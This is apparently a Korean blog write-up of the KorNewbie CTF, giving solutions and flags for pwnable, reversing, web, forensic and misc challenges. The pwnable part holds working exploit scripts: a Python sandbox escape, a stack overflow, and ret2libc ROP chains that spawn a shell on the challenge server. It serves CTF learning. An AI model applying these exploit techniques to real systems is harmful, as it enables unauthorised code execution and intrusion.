Pwnable: python_jail
|
1
2
|
o={x.__name__:x for x in object.__subclasses__()}['StreamReaderWriter'].__init__.__globals__['sys'].modules['o'+'s'];o.spawnlp(o.P_WAIT, 'ls', 'ls', '-la', './home/python_jail')
o={x.__name__:x for x in object.__subclasses__()}['StreamReaderWriter'].__init__.__globals__['sys'].modules['o'+'s'];o.spawnlp(o.P_WAIT, 'cat', 'cat', './home/python_jail/flag')
|
Flag: KorNewbie{H311o_h0w_@r3_y0u_d0lng?}
Pwnable: babypwn
|
1
2
3
4
5
6
7
8
9
|
def exploit3() :
print('[Exploit] Challenge: babypwn')
p = connect('prob.vulnerable.kr', 20035)
payload = 'A'*(0x400+8)
payload += p64(0x400636)
p.sendline(payload)
p.interactive()
|
Flag: KorNewbie{Th1s_1S_R34L_Fl4g_C0ngr4tu14ti0n5!}
Pwnable: OneShot_OneKill
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
|
def exploit1() :
print('[Exploit] Challenge: OneShot_OneKill\n')
p = connect('prob.vulnerable.kr', 20026)
puts_plt = 0x80483D0
gets_got = 0x804A010
puts_got = 0x804A014
pop_1_ret = 0x8048399
payload = 'A'*(0x12C+4)
payload += p32(puts_plt)
payload += p32(pop_1_ret)
payload += p32(gets_got)
payload += p32(puts_plt)
payload += p32(pop_1_ret)
payload += p32(puts_got)
payload += p32(0x804851B)
p.sendline(payload)
p.recvuntil('it?\n')
p.readline()
gets_mapped = u32(p.readline()[0:4])
puts_mapped = u32(p.readline()[0:4])
print('[Exploit] gets = '+hex(gets_mapped))
print('[Exploit] puts = '+hex(puts_mapped))
# libc6-i386_2.23-0ubuntu11_amd64
libc_base = gets_mapped-0x5E890
system_mapped = libc_base+0x3A940
bin_sh_mapped = libc_base+0x15902B
print('[Exploit] libc_base = '+hex(libc_base))
print('[Exploit] system = '+hex(system_mapped))
print('[Exploit] str_bin_sh = '+hex(bin_sh_mapped))
payload = 'A'*(0x12C+4)
payload += p32(system_mapped)
payload += p32(pop_1_ret)
payload += p32(bin_sh_mapped)
p.sendline(payload)
p.interactive()
|
Flag: KorNewbie{Nice_Sh0T_N3wbie_Pwner!$#}
Pwnable: dRop_the_beat
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
|
def exploit2() :
print('[Exploit] Challenge: dRop_the_beat')
p = connect('prob.vulnerable.kr', 20002)
# libc6-i386_2.23-0ubuntu11_amd64
puts_plt = 0x80483E0
read_got = 0x804A00C
pop_1_ret = 0x80483B9
payload = 'A'*(0x64+4)
payload += p32(puts_plt)
payload += p32(pop_1_ret)
payload += p32(read_got)
payload += p32(0x804853B)
p.recvuntil('..!\n')
p.sendline('1')
p.recvuntil('!!\n')
p.write(payload)
p.recvuntil('AWESOME!\n')
read_mapped = u32(p.readline()[0:4])
print('[Exploit] read = '+hex(read_mapped))
libc_base = read_mapped-0xD4350
system_mapped = libc_base+0x3A940
bin_sh_mapped = libc_base+0x15902B
print('[Exploit] libc_base = '+hex(libc_base))
print('[Exploit] system = '+hex(system_mapped))
print('[Exploit] str_bin_sh = '+hex(bin_sh_mapped))
payload = 'A'*(0x64+4)
payload += p32(system_mapped)
payload += p32(pop_1_ret)
payload += p32(bin_sh_mapped)
p.recvuntil('..!\n')
p.sendline('1')
p.recvuntil('!!\n')
p.write(payload)
p.interactive()
|
Flag: KorNewbie{R0PR0PR@P~@!#GrE4T_3EaT_!ROPROPROP*@(#}
Reversing: LOW_MIPS
MIPS Assembly, big endian
|
1
2
3
4
5
6
7
|
addiu $29,$29,-8
addi $0,$1,10
addi $1,$1,2
sw $1,0($29)
addi $1,$2,4
sw $2,4($29)
addiu $29,$29,8
|
Flag: KorNewbie{16}
Reversing: BABYREV
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
|
#define _CRT_SECURE_NO_WARNINGS
#include <stdio.h>
#include <stdlib.h>
int main() {
char dec[36] = "korNewbie{AAAAAAAAAAAAAAAAAAAAAAAAA}";
char flag[36];
FILE *flagf = fopen("flag.txt", "rb");
fread(flag, 1, 36, flagf);
fclose(flagf);
setvbuf(stdout, NULL, _IONBF, 0);
setvbuf(stderr, NULL, _IONBF, 0);
for (int i=10 ; i<=34 ; i++) {
for (int c=32 ; c<=127 ; c++) {
dec[i] = c;
FILE *in = fopen("t.txt", "wb");
fwrite(dec, 1, 36, in);
fclose(in);
system("babyrev.exe t.txt >nul");
FILE *out = fopen("enc.txt", "rb");
char enc[36];
fread(enc, 1, 36, out);
fclose(out);
if (flag[i] == enc[i]) break;
}
printf("Char %d: %c\n", i, dec[i]);
}
printf("\nFlag: ");
for (int i=0 ; i<36 ; i++) putchar(dec[i]);
return 0;
}
|
Flag: korNewbie{ba8y_rev_i$_very_Very_eZ!}
Webhacking: Normal_Host
URL escape code
url = %6Eormalflag.iwinv.net
Flag: KorNewbie{H0$7_$P1it_A774cK_U$3s_N0RM^liZ47ioN&##$%%!}
Forensic: Top Secret
strings -n 10 ./Windows\ 7\ Enterprise\ K-b94208dd.vmem | grep -i 'KorNewbie'
Flag: KorNewbie{OH..You_Know_B4sic_0F_M3mory_Forensics!}
Forensic: Contact point
Unpack file with extractor.
Location: /apps/com.android.browser/db/browser2.db
SQLite 3.x database
Google search history: Jeju_international_airport
Flag: KorNewbie{Jeju_international_airport}
Forensic: Find The Plain
Packet filter: ftp
Used FTP commands: USER ftpdir; PASS root; STOR badguy.txt
Sent data is stored in packet 3254.
Data
7J2067O06rKMIOyVjO2MjO2MgOydmCDsi6Dsg4HsoJXrs7TripQg67CR7J2YIOyjvOyGjOyXkCDrqqjrkZAg64u07JWE64aT7JWY64SkLiDqsbTtiKzrpbwg67mM7KeA7JuM7YSwLi4gDQpodHRwczovL3Bhc3RlYmluLmNvbS83MHlER2lSUw==
Decoded with BASE64
이보게 알파팀의 신상정보는 밑의 주소에 모두 담아놓았네. 건투를 빌지워터.. https://pastebin.com/70yDGiRS
The string provided at the link is: k459iki6m5j094m2lmkhjmi9527l81ml
Also there is a comment in the 3229th packet (STOR command) which implies caesar encryption with key=7.
MD5 Hash: d459bdb6f5c094f2efdacfb9527e81fe
Crack: The new boss is IronDragon
Flag: KorNewbie{root_IronDragon}
Forensic: REC
File signature is missing. Insert 2 byte 'MZ' at front position and run the executable.
Flag: KorNewbie{Recover_Signature}
Misc: Catch Me
Analyze frame by frame.
119 48 119 95 101 52 103 49 101 95 51 121 51 > w0w_e4g1e_3y3
Flag: KorNewbie{w0w_e4g1e_3y3}
Misc: BiMilCode
ASCII shift with hidden key
|
1
2
3
4
5
6
7
8
9
10
11
12
|
_enc = 'c5 97 84 81 68 6a 67 5d'
_space = '7b 56 43 79 26 29 23 46'
ans = ''
for _ in range(8) :
e = int(_enc.split()[_], 16)
s = int(_space.split()[_], 16)
ans += chr(32+e-s)
print('\n'+ans)
|
Flag: KorNewbie{Nace_I_believed_it}
'CTF > CTF Playground' 카테고리의 다른 글
| Rice Tea Cat Panda (0) | 2020.01.22 |
|---|---|
| Christmas CTF (0) | 2019.12.25 |
| Kipod After Free CTF 2019 (0) | 2019.12.22 |
| TUCTF 2019 (0) | 2019.12.01 |
| HCTF 2019 Beginner Section (0) | 2019.11.17 |
